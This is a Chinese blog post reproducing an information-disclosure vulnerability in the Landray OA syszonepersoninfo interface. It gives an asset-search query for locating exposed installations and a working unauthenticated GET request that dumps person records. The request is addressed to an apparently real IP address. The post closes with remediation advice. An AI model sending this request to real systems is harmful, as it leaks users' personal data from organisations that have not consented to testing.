蓝凌OA syszonepersoninfo 信息泄露漏洞

最新推荐文章于 2025-06-06 17:29:07 发布
最新推荐文章于 2025-06-06 17:29:07 发布
阅读量1.8k 收藏 5
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36618918/article/details/135915527
版权

产品介绍

蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。

漏洞描述

蓝凌OA syszonepersoninfo 接口存在信息泄露漏洞,攻击者可通过此漏洞获取敏感信息。

资产测绘

app=“Landray-OA系统”

在这里插入图片描述

漏洞复现

POC如下:

GET /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=20&s_ajax=true HTTP/1.1
Host: 1.194.229.235:9001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

在这里插入图片描述

修复建议

修复建议
1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、对相关接口进行鉴权。

蓝凌OA custom命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-18 727
蓝凌OA custom命令执行漏洞(含批量验证poc)
漏洞复现】蓝凌OA-wechatLoginHelper-sql注入
知黑而守白
02-28 1248
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台。蓝凌EIS智慧协同平台 wechatLoginHelper 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
【复现】蓝凌OA 信息泄露漏洞_35
fushuang333的博客
01-31 1305
【复现】蓝凌OA 信息泄露漏洞蓝凌智能OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品,
蓝凌(Landray)OA漏洞常见RCE
A_991128a的博客
03-08 2575
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
蓝凌EIS智慧协同平台 ShowUserInfo.aspx 存在 SQL注入漏洞
3tefanie丶zhou的博客
01-10 706
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 ShowUserInfo.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌OA 信息泄露
waxcj的博客
02-02 423
蓝凌OA 信息泄露
蓝凌OA getLoginSessionId.html 信息泄露漏洞
3tefanie丶zhou的博客
12-19 3142
【男女情爱,相互喜欢时,是圆圆镜,团团月。情伤过后,就是一锤碎出无数月,好像没那么喜欢了,但是记起更多。】
漏洞复现】蓝凌OA wechatLoginHelper存在SQL注入漏洞
失心少年
02-29 578
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业。蓝凌OA存在SQL注入漏洞。SQLMP 也可以直接跑。
蓝凌OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
蓝凌OA系统排名?蓝凌OA办公系统怎么选?什么是用户口碑最好的蓝凌OA系统?
04-13
蓝凌OA系统作为国内知名的协同办公平台之一,其产品涵盖了从基础办公到高级流程管理等多个方面,旨在为企业提供一站式的信息化解决方案。蓝凌OA不仅支持传统的企业内部办公需求,还融合了移动办公、社交协作等现代...
蓝凌OA系统V15.0管理员手册.zip
07-08
蓝凌OA系统V15.0是一款针对企业日常办公自动化需求设计的高效管理工具,它为企业提供了一整套流程审批、文档管理、协同工作、信息门户等核心功能,旨在提升企业的办公效率,优化业务流程。作为系统管理员或运维人员...
蓝凌OA管理员培训视频
05-25
蓝凌OA管理员培训视频是一系列专门针对蓝凌企业数字化办公平台——钉智能OA的管理与操作的教学资源。这些视频教程旨在帮助用户深入理解和熟练掌握OA系统的各项功能,提升管理员在日常运维、权限管理、流程配置等...
加密货币钱包开发指南:多链资产管理与非托管安全范式
最新发布
Lovely_xwys的博客
06-06 1039
后端:Rust(高性能核心模块) + Go(跨链通信层);前端:React Native(跨平台兼容) + Web3.js(区块链交互);区块链适配:以太坊Solidity、Solana Anchor框架。
安全】VulnHub靶场 - W1R3S
风舞雪凌月的博客
06-02 670
本文记录了对W1R3S.inc服务器的渗透测试过程。通过扫描发现靶机开放21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)端口,其中FTP存在匿名登录漏洞,获取到包含潜在密码线索的文档。Web服务发现Apache默认页面及Cuppa CMS安装界面,同时存在WordPress目录但访问受限。测试人员尝试了SSH和MySQL的弱口令爆破未果,后续将重点利用FTP获取的信息和Web应用漏洞进行深入渗透,最终目标是获取root权限并找到/root目录下的flag。测试过程展示了从信息收集到漏
当 “欧洲版 Cursor” 遇上安全危机
2401_86652632的博客
06-03 618
今年 3 月 20 日,Palmer 发现 Lovable 创建的 Linkable 网站存在漏洞,只需修改查询参数,就能获取项目 “用户” 表中的所有数据,他甚至因此看到了约 500 名该应用用户的电子邮件地址。漏洞报告显示,这项安全扫描仅仅是确定 Supabase 数据库是否启用访问控制,而对于控制选项是否正确配置这一关键问题,却选择了回避,导致网站依然面临数据操纵和注入等严重安全问题,充分暴露出 Lovable 生态系统中系统性的 RLS 实施缺陷。在追求便捷开发的同时,安全绝不能被忽视。
本地部署企业邮箱,让企业办公更安全高效
U-Mail邮件服务器软件
06-06 408
基于安全性、个性化需求、系统集成等方面的考量,越来越多的企业倾向于选择本地部署企业邮箱,本地化部署不仅能够有效守护企业信息安全,还能依据企业未来发展的需求,灵活调整企业邮箱系统的功能,甚至进行二次开发,同时实现与其他办公系统的无缝集成,为企业数字化办公提供坚实支撑。企业邮箱系统运行在稳定的环境中,访问速度更快,系统运行更可靠,能够有效避免因网络问题导致的邮件服务中断。本地部署的企业邮箱可以与企业现有的OA系统、CRM、ERP等办公系统无缝对接,形成统一的数字化办公平台。
第二章 2.3 数据存储安全风险之数据存储风险防范
weixin_43172311的博客
06-04 1137
大家好,今天我想和大家聊聊一个既专业又与我们生活息息相关的话题——数据安全风险防控。无论你是普通用户还是技术从业者,了解这些内容都能帮助你在数字世界中更好地保护自己和他人。
【Java后端基础 005】ThreadLocal-线程数据共享和安全
金哥的博客
06-06 817
ThreadLocal常用方法,经典应用场景,以及解析
蓝凌OA SSRF漏洞
11-15
根据您提供的引用内容,我可以为您回答关于蓝凌OA SSRF漏洞的问题。 蓝凌OA是一款企业级办公自动化软件,由于其在设计上存在一些安全漏洞,因此被黑客利用进行攻击。其中,SSRF漏洞蓝凌OA中的一种常见漏洞类型。SSRF漏洞是指攻击者可以通过构造恶意请求,使服务器发起对内部网络中其他服务的请求,从而实现攻击的目的。 具体来说,攻击者可以通过构造恶意请求,使蓝凌OA服务器向攻击者指定的URL地址发起请求,从而获取攻击者想要的信息。攻击者可以利用这个漏洞获取服务器内部的敏感信息,或者进一步利用该漏洞进行攻击。 为了防止蓝凌OA SSRF漏洞的攻击,建议管理员及时更新蓝凌OA的补丁,并对蓝凌OA进行安全加固。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值